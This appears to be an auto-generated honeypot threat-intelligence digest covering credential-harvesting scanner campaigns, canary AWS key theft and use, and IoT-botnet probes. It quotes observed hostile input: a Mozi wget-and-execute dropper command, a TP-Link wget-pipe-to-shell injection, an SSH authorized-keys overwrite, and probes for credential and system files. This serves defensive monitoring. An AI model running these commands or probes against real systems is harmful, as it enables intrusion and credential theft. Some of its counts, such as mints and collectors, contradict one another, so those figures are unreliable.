FLUX FLEET — INTEL BRIEFING №19
Period: 2026-09-12 07:36 – 2026-09-13 07:36 UTC (24h digest window, day 18 of operations) Sources: 7 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East), ru-edge-1 (Russia), netcup-ts + sponge-01-ts + frantech-ts (deception-only, no canaries) Confidence: High (direct observation; 18-day baseline, every result-tag spike attributed by spot query)
The digest window runs 07:36 UTC 09-12 to 07:36 UTC 09-13. Events before 12:14 UTC on 09-12 are overlap with №18 and are not recounted as new. All times below are raw log timestamps (UTC). The +4 h ingest cast widens SQL windows by 4 hours.
BLUF
The canary funnel moved for the first time in four windows: an attacker used three credentials minted on ai-devbox-1, all three bedrock:Converse calls denied at 18:33 UTC 09-12 from GCP IP 35.245.185.138 under Go-http-client/1.1. The credentials were minted 30 seconds earlier by an unattributed crawler wave that hit all 7 nodes with empty clientIp — 600-plus paths and roughly 450 rotating forged crawler UAs per node in under 30 seconds, the largest single-template sweep in fleet history. The wave carries a third of the METADATA-HUNT GCP wordlist, so the fleet reads it as an escalated METADATA-HUNT variant that now hides its source IP. LIBREDTAIL-KIT ran its fifth and widest window — 11 runs across all 7 nodes, zero mints, zero captured dropper bodies. OMEGA-SWEEP escaped to three more nodes, and CURL-SWEEP returned on schedule with 10 more unattributed mints. Control-1 grew to 4,254 events and did not reset; the recovery sync now appends.
Key Judgements
- The credential-use drought broke, and the user is GCP-hosted — but the theft IP is still unknown. Three ai-devbox-1 canaries minted at 18:32:38 UTC drew
bedrock:Conversecalls at 18:33:06–07 from 35.245.185.138 (Google LLC), all denied by thelegacyOwnerAccess-DenyAllpolicy. The mint rows carry an emptyclientIpbecause the mega-census wave sends no forwarding headers; the use IP 35.245.185.138 appears nowhere in flux logs, all-time or window. The 30-second mint-to-use gap and the GCP egress match the METADATA-HUNT runner pattern (34.x/136.x GCP operators mint in bursts). (High confidence on the use facts — Tracebit CloudTrail records the operation, deny policy, IP, and UA. Moderate on the link to the minting wave — the mint IP is unknown and the use IP never appears in flux logs.) - METADATA-HUNT escalated from a 25-mint per-runner tool to a fleet-wide 600-path census with source suppression. The empty-IP wave ran 68–80 marker events per node in 5–28 seconds — ru-edge-1 12:47, ai-devbox-1 18:32, frantech-ts 19:07, netcup-ts 22:37, control-1 06:25, sponge-01-ts twice (17:32 and 07:07) — with 465–467 distinct forged crawler UAs per burst (Amzn-SearchBot, Claude-User, ChatGPT-User, Perplexity-User, GrokBot, Bytespider, TelegramBot, facebookexternalhit). Wordlist overlap with the named runner 136.70.175.146's 609-path run is 214 of 602 paths. The fleet design held: fake 200s and tarpits, 1 mint on the burst, 24 upstream 400s on ai-devbox-1. (High confidence on template linkage — shared
@fsand__aws_leak_probemarker paths on all 7 nodes plus 214-path overlap. Moderate on the operator-merge question — UAs and paths rotate per run, so the merge rests on the shared core.) - LIBREDTAIL-KIT is now a standing fleet-wide commodity. The
libredtail-httpUA ran 11 bursts of ~49 events across all 7 nodes (frantech-ts three runs, ru-edge-1 two, canary-farm-1 three, ai-devbox-1, control-1, netcup-ts one each), zero mints, and for the first time zero captured POST bodies — the dropper exfil step left nobodyPreviewin this window's feed. The template's 5-phase shape (phpunit probe → RCE POST → key echo → dropper) held on the canary nodes from prior windows. (High confidence on the runs; the dropper staging host is unmeasured this window because no body was captured.) - control-1's log file now grows instead of resetting. The synced file holds 4,254 rows against 1,813 after the №18 recovery — a clean append across a full cycle. The node logged 4,254 events / 52 real IPs, +51% over its 7-day event baseline, all of it from the OMEGA 21:19 burst (1,041 events, 1,033 paths, 16 s), the ENV-CENSUS-2 return (11:11–13:00, 1,615 events, 513 paths, 22 UAs with the
Mozlilaforgery), and the 06:19–06:26 mega-census. (High confidence —wc -lgrowth verified directly.)
Active Campaigns (day 18 status)
Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity. Events before 12:14 UTC 09-12 are №18 overlap and marked as such.
⟳ METADATA-HUNT (GCP crawler census, empty-IP escalation) — hostile, fleet-wide, escalated ⚠
- Actors: Named runner 136.70.175.146 (Google LLC, farm, 839 events / 609 paths / 138 trap families, 06:33–06:34 UTC overlap segment, 4 mints + 21 upstream 400s — №18 reported the same run). The escalated empty-IP wave: no client IP on any of the ~430 fleet rows, 465–467 forged crawler UAs per burst, one 5–28 s burst per node, 6 of 7 nodes plus a second sponge pass 13 h later.
- TTPs: GCP/AI-config template at scale:
/.envvariants,/@fs/proc/self/environ,/@fs/etc/passwd,/@fs/root/.env,/@fs/proc/self/cwd/.azure/credentials,__aws_leak_probe_<8hex>markers,/.mcp.json, SSRF-relay probes (ssrf-relay-aws-index,ssrf-relay-aws-role-list, 19 each on the big bursts). UAs rotate per request — 465 distinct strings in 10 seconds on ai-devbox-1 — defeating per-UA rate rules. The named runner minted from/.envunder Amzn-SearchBot, Claude-User, ChatGPT-User, and meta-externalagent forgeries; the escalated burst minted once on ai-devbox-1 (18:46 single-walker, 11 events) plus the three credentials used in AWS. - Assessment: This is the same operator class at 24× the path volume with source headers stripped. The 30-second mint-to-use conversion on the escalated wave is the fastest hostile consumption the fleet has recorded — the operator does not hoard these credentials, it burns them immediately against Bedrock. The fleet's forged-crawler ban list (№14–№15) is now load-bearing: every UA in the wave is on it.
⚠ ENV-CENSUS-2 (control-byte .env wordlist, unattributed) — hostile, second run on control-1
- Actors: Unattributed. control-1 only this window. 11:11–13:00 UTC 09-12: 1,615 events, 513 paths, 22 UAs including the
Mozlila/5.0 (…Bulid/NRD90M…Moblie…)typo forgery (177 rows) and the literalMore Firefox 2.0.0.16 user agents strings -->>string. Two mints at 09:29 (Edge/124 forgery) and 11:11 (Edge/131 forgery) — both inside the №18 overlap; the new-segment mint is the 06:19 Chrome/45 census crawler row. - TTPs: The control-byte-suffixed
.envwordlist returned (no control-byte paths appeared this window — the census ran the plain 513-path list), pluswebshell-sweep-observed(33 events) andphpinfo-error(51). No source IP on any row. - Assessment: Second consecutive window on control-1, same identity pattern, same two-mint outcome. The campaign now has a two-day history on the one node that logs no source IPs — it either targets the fresh-IP baseline deliberately or runs wherever attribution is weakest. Promotion to multi-node on any EU-node appearance.
⟳ OMEGA-SWEEP (107-family config census, forged Googlebot/2.1) — hostile, fleet-wide, escaped the /46 block's home nodes
- Actors: 94.154.46.246 (Omegatech US, aidev, 1,500 events / 743 paths / 12 s, 10 mints — №18 overlap, recounted). The template then ran unattributed on three more nodes: control-1 21:19 (1,041 events / 1,033 paths / 16 s, 6 upstream 400s, 0 mints), frantech-ts 00:24 (300 events / 150 paths, two 150-path passes in 2 s), netcup-ts 15:20 (150 events / 150 paths).
- TTPs: The 743-path wordlist is intact: aidev's run shares 734 of control's 1,033 paths, and the frantech/netcup passes share all 150 of their paths with the aidev core. Forged
Googlebot/2.1UA on every row. The control run probed 1,033 paths — a 40% larger list than any prior OMEGA run. - Assessment: Four nodes in one window is the widest OMEGA spread yet, and the no-canary nodes saw the template for the first time. Every live /46 IP has minted (№16–№17); the operator now mass-runs the census under empty IPs, so the 20-cred hoard across the block is still growing without attribution.
⟳ CURL-SWEEP (uniform curl/8.5.0 probe wave) — hostile, returned on schedule, still unattributed
- Actors: Unknown. Same two-part shape as №18: a direct wave with empty
clientIp(07:59–08:55 UTC, all 7 nodes, 10/.envmints — 4 farm, 2 aidev, 2 control, 2 ru-edge) and a Docker-bridge loopback pass under172.18.0.1(12 events, 10 upstream 400s) two minutes later. Follow-on single curls ran through 06:23 UTC 09-13 (aidev/.envmint under Chrome/106 forgery at 23:15, netcup pass 05:56). - TTPs: Same probe set:
/.env,/wp-login.php,/api/v1/payment-methods,/.well-known/agent-card.json,/actuator,/shell.php. The 08:54 wave minted on 4 nodes in 14 s. - Assessment: Second consecutive window, same wave shape, same hour. This is automation with a daily schedule. Ten more credentials are now hostile-held with no source IP. The 09-13 follow-ons under forged browser UAs suggest the operator rotates UA families after the curl pass.
⟳ REGISTRY-HUNT (LeakIX weblogic/confluence/docker-registry walk) — borderline scanner, contracted wave
- Actors: 6 IPs this window vs №15's 24: 4 DigitalOcean runners with full 25-step journeys (167.99.181.249, 68.183.9.16 on aidev; 138.68.144.227, 157.245.113.227 on farm, 39 events each at 00:30–00:36 UTC 09-13) plus 2 empty-IP runners (78 events each). Two UA variants persist (
l9scan/2.0.632323…aidev,l9scan/2.0.234313…farm), 156 events per variant. - TTPs: Unchanged: WebLogic console → Confluence → WHM → docker-registry
/v2/internal/...enumeration. One mint at 20:29 (farm, empty-IP wave segment). - Assessment: LeakIX is a public leak-scanning service; the fleet holds it at borderline. Volume contracted 24 → 6 IPs, but the evening wave held its shape for a fourth window.
⚠ XMLRPC-BRUTE return (fourth operator, empty-IP) — hostile
- Actors: Unattributed. 60 POSTs to aidev
/xmlrpc.phpin 10 s at 01:49 UTC 09-13 under a forged Chrome/78 UA, 60 more to canary-farm-1 in 0.8 s at 02:10, 1 stray on control at 03:24. Host headers carry the TLS trap names (inference.fapthropic.com). - TTPs:
system.multicall-shaped POSTs with 484-byte bodies (bodies not captured inbodyPreviewthis window — the feed stored none). No preflight trio, no fixed username visible. - Assessment: Fourth operator in four active windows (1337 Services → 35.233.85.98 → 207.175.64.93 → this), each with a different UA and cadence. The template is fully commoditized; the empty-IP variant now hides even the source. Watch for the fixed-username tell when a capture lands.
⟳ NIGHTAGENT — idle
No NightAgent markers, no GitHub dropper fetches, no residential MA/NL multi-stage journeys this window. Second consecutive idle window after seven.
Standing actors (persistence check)
- 193.24.123.123 — the №17 watch item ran 7
/-only tarpit events, all inside the №18 overlap segment. No credential paths. Keep on watch. - 176.65.148.71 (Chrome/124 forgery) — sixth visit since 09-01: the two-request
/.env+/.env.jsonpair on aidev at 06:16, 1 mint (3 all-time). Fifth consecutive window with the same pair. Standing single-purpose collector. - 16.5.0.236 (
Hello WorldUA) — returned on both EU nodes, 6 events,/-only, 04:24–07:06 UTC. Benign-shape. A separateHello, worldUA probe hit control's/shellat 12:31 with a Mozi dropper query (wget http://202.70.139.174:41916/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws) — ⚠ new IoT-botnet shape on flux, unattributed, single event. - Absent: 80.94.95.211 (SS-Net, broke an 11-window streak), 45.148.10.238, 91.245.74.31, 213.209.159.154, 204.76.203.18/.10/.7 (MALWARE-DICT loop silent), 43.228.157.68, 159.26.110.179, MEVSPACE-GITWALK's both operators (third idle), CRUSADER-SWEEP (sixth idle), 193.32.204.199, 91.92.47.27, 167.99.79.44, 45.156.128.x cluster, 45.156.129.136.
- Single-mint first-ever collector: 40.87.20.23 (Azure, farm 07:10 09-13; 1 event on aidev 00:25). Both its events minted — a two-node, two-mint, two-event actor. Watch.
- research-scan/1.0 (129.213.151.234, Oracle) — returned after №14 absence: 47 events, 45-path
fake-gitwalk on farm in 31 s, honest UA, 0 mints. Borderline per registry.
Canary credentials
Summary
Fleet sensors minted 39 credentials in the window (aidev 18, farm 13, control 5, ru-edge 3) to 6 named collector IPs plus 21 unattributed mint rows. Three credentials were used in AWS, all denied. 142 mint attempts drew upstream 400 rejections.
Mint → use funnel
| Metric | Count |
|---|---|
| Credentials minted (fleet, window) | 22 |
| Distinct collector IPs | 1 |
| Credentials used in AWS (alerts) | 3 |
| Credentials stolen, no observed AWS use in window | 19 |
Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):
| Theft IP | Sensor | Mints (window) | Creds used in AWS | Use IPs | Operations | Mint history (6d) |
|---|---|---|---|---|---|---|
40.87.20.23 |
canary-farm-1 | 1 | 0 | 0 | — | 1 mints since 2026-09-13 07:10 |
unknown |
(outside flux window) | 0 | 3 | 1 | Converse | no flux mints in history window |
Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):
136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:5534.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:2634.32.131.244: 25 mints, 2026-09-11 21:44 → 2026-09-11 21:4434.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:0934.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:1035.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:52None: 21 mints, 2026-09-12 08:14 → 2026-09-13 06:19167.99.79.44: 12 mints, 2026-09-08 19:11 → 2026-09-11 18:1994.154.46.247: 12 mints, 2026-09-06 19:02 → 2026-09-06 19:0294.154.46.249: 12 mints, 2026-09-11 13:47 → 2026-09-11 13:4894.154.46.245: 10 mints, 2026-09-10 16:25 → 2026-09-10 16:2594.154.46.246: 10 mints, 2026-09-12 04:12 → 2026-09-12 04:1394.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:5180.94.95.211: 8 mints, 2026-09-06 08:36 → 2026-09-12 02:32102.220.161.87: 4 mints, 2026-09-07 23:07 → 2026-09-09 13:44136.70.175.146: 4 mints, 2026-09-12 06:33 → 2026-09-12 06:33142.93.129.190: 4 mints, 2026-09-07 20:16 → 2026-09-10 20:23160.177.217.115: 4 mints, 2026-09-11 21:02 → 2026-09-11 21:43176.65.144.71: 4 mints, 2026-09-09 21:56 → 2026-09-09 21:5631.57.219.158: 4 mints, 2026-09-06 13:11 → 2026-09-06 13:2345.148.10.238: 4 mints, 2026-09-06 16:43 → 2026-09-07 08:16139.59.136.184: 3 mints, 2026-09-06 20:35 → 2026-09-10 20:35159.65.18.197: 3 mints, 2026-09-06 20:35 → 2026-09-11 20:40176.65.148.71: 3 mints, 2026-09-06 18:50 → 2026-09-12 06:1641.140.11.235: 3 mints, 2026-09-08 06:34 → 2026-09-08 06:4584.21.173.161: 3 mints, 2026-09-06 22:19 → 2026-09-07 13:00
Canary-use attribution (briefing prose)
The funnel opened for the first time since №14: three credentials minted by the empty-IP mega-census on ai-devbox-1 at 18:32:38 UTC drew bedrock:Converse calls at 18:33:06–07 from 35.245.185.138 (Google LLC) under Go-http-client/1.1. All three failed with AccessDenied under the legacyOwnerAccess-DenyAll identity policy. The mint paths were /.env (Applebot-forged Firefox/133.6), /@fs/proc/self/environ (LinkedInBot forgery), and /.aws/credentials (OAI-SearchBot/1.3 forgery) — all three UAs sit in the mega-census's rotation, so the same burst that minted the credentials read them back into AWS within 30 seconds. This is the fastest mint-to-use the fleet has recorded and the first consumption of an unattributed-mint credential that Tracebit observed.
The use IP never appears in flux logs — not this window, not all-time. The 35.245.x.x block is Google Cloud (Ashburn), the same hosting region as METADATA-HUNT's named runners (34.x, 136.x). The evidence supports this chain: the census mints → the operator (or its automated consumer) loads the credentials → an AWS call fires from GCP. What it does not prove: that 35.245.185.138 is the same party that scraped the trap. Credential resale would produce the same trace. The three Converse denials match the №13–№14 pattern (136.85.124.29, 34.22.137.199 — 26 and 34 denied Converse uses) and show the actor's goal is model invocation, not account takeover.
The None collector entry in the 6-day history (21 mints, 09-12 08:14 → 09-13 06:19) is the CURL-SWEEP plus census unattributed batch. The mint failures (142 400 Bad Request upstream rejections, digest tracebit-http-error rows: aidev 45, farm 44, control 40, ru-edge 13) cluster on the census and curl bursts — the upstream rate-limits burst-speed minting, so each burst's real haul is higher than the mint count shows.
Fleet Observations
- Canary economics: 39 mints to 6 named collectors + 21 unattributed rows; 142 upstream 400 failures. All mints
aws-type. Per-node: aidev 18/45, farm 13/44, control 5/40, ru-edge 3/13. The failure ratio (3.6:1) is the highest on record and concentrates in the mega-census and curl bursts — burst-speed minting trips the upstream rate limiter. - XFF forgery: 50 multi-entry chains, 0 all-internal
127.0.0.1rows — the fleet-side fix held for a ninth window. - TLS/attribution posture: farm 289 https events (631 Host-header hits on
sso.rightabouteverything.show), aidev 279 https oninference.fapthropic.com, control 1, the four certless nodes 0. The xmlrpc brute aimed its POSTs at the TLS trap names, the first campaign to target the https surface directly. - Attribution gap: 13,945 of 18,265 window rows carry an empty
clientIp— 100% on the four no-canary nodes, 99% on control, 49% on aidev, 53% on farm. Every empty-IP row this window also carried noX-Forwarded-For,True-Client-Ip, orX-Client-Ipheader (spot-checked on the xmlrpc, census, and curl rows). The mega-census, CURL-SWEEP, ENV-CENSUS-2, and the new XMLRPC operator are all invisible to IP attribution. The ops-repo socket-peer fix remains the single highest-value change available. - Control discovery velocity: day 18 cell: 4,254 events / 52 real IPs (53 digest cell = 52 real + 1 NULL group). First full-day cell after the recovery: the ramp holds at 50–100 identities/day. Series for the record: 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 → blind → blind → blind → 51 (4-hour cell) → 52.
- IoT-botnet drift onto flux: three shapes this window — the Mozi
/shelldropper query on control, the TP-Linksoho-router-diag$(wget .../router.tplink.sh -O-|sh)command-injection probes on control/netcup/ru-edge, and the first-seen/boaform/admin/formLoginprobes on 4 nodes (sponge, frantech, ru-edge, farm — the 16.5.0.236 SOHO shape). NetgearMozi.mvia/setup.cgion frantech. All single-digit events, all unattributed. The flux surface is now being swept by the same commodity IoT tooling that runs the frantech ssh/telnet honeypots. - Result-tag spikes: all attributed. control-1's nine 3.0×+ tags are the ENV-CENSUS-2 return (11:11–13:00), the OMEGA 21:19 burst, and the 06:19 mega-census. aidev
wp-xmlrpc-post60 = the 01:49 Chrome/78 burst. frantech/netcup/ru-edge/sponge "infx" spikes are first-full-window baselines for the new nodes, not anomalies — frantech'snot-handled1,325 is the Chrome/114 349-path crawler (349 unique paths, 11:12–03:51), the forged-Googlebot OMEGA passes, the libredtail runs, and single-event commodity probes.
SSH/telnet honeypot (frantech-ts — single sensor, not fleet-wide)
- New commands: zero. All 53 distinct commands this window were seen before. The 4,570-event
uname -s -v -n -r -mpair (7 IPs) and the 931-IPrm -rf .ssh+ authorized-keys inject remain the load-bearing recurring set. No post-compromise news is good news. - Funnel: 533 sources sent credentials → 349 got a shell (65%) → 253 ran a command (72% of shell-getters, 47% of sources). Event level: 38,787 attempts → 17,886 accepted logins → 12,281 commands. The 69% accepted-login-to-command rate says operators work the boxes rather than spray.
- Credentials: 17,232 distinct pairs, 86 new. No concentration — top pair drew 3 attempts (the
Userm/Userm@1234family, 6 of the top 8 rows). Commodity noise, no campaign signal.
Gaps / Next Collection
- The AWS consumer trail. 35.245.185.138 used three stolen canaries 30 seconds after mint. Pull the full CloudTrail set for account 281089587113 for the mint's 12-hour TTL (expires 06:32 UTC 09-13) — any further calls from that credential family tie the mega-census to a persistent operator. If nothing fires, the consumer burned three keys once and stopped.
- Socket-peer logging for headerless requests (carried from №17–№18). The mega-census, CURL-SWEEP, ENV-CENSUS-2, and the new XMLRPC operator are all empty-IP. The ops-repo fix attributes four campaigns at once. No fleet-side action from this workflow.
- LIBREDTAIL dropper capture. The 11 runs this window produced zero POST bodies — the condensed feed dropped
bodyPreviewfor these rows. If the next window also shows none, check whether the digest's body-capture changed or the template stopped sending payloads. The staging host (217.60.195.113or successor) is unmeasured. - Mega-census recurrence. One wave, 6 nodes, 5–28 s each. A second run on schedule makes the automation read solid; a third with the 609-path runner wordlist merged makes the METADATA-HUNT merge solid. Watch for the wave's UA rotation to drift off the ban list.
- CURL-SWEEP day-three check. Two consecutive windows, same shape. If a third runs in the 08:00 hour, treat as cron-like and correlate its
/.envmint times against the mega-census schedule — the two may share a scheduler. - 40.87.20.23. Two events, two nodes, two mints, first-ever appearance at the window edge. If it returns on any node, pull the ip-journey — a 1:1 events-to-mints ratio across nodes is a collector signature, not a scanner.
Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-13.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (94.154.46.246, 136.70.175.146), plus 30 ad-hoc v_full queries (xmlrpc attribution, curl-wave recurrence and 172.18.0.1 bridge pass, phpunit/libredtail distribution and dropper-body check, empty-clientIp census, METADATA-HUNT marker and wordlist joins across 7 nodes, OMEGA wordlist overlap matrix, ENV-CENSUS-2 return profile, standing-actor persistence, Mozi/soho-router probes, mint-failure hourly attribution, 40.87.20.23 history, 1.2.3.4 test rows) and the Tracebit canary-section generator.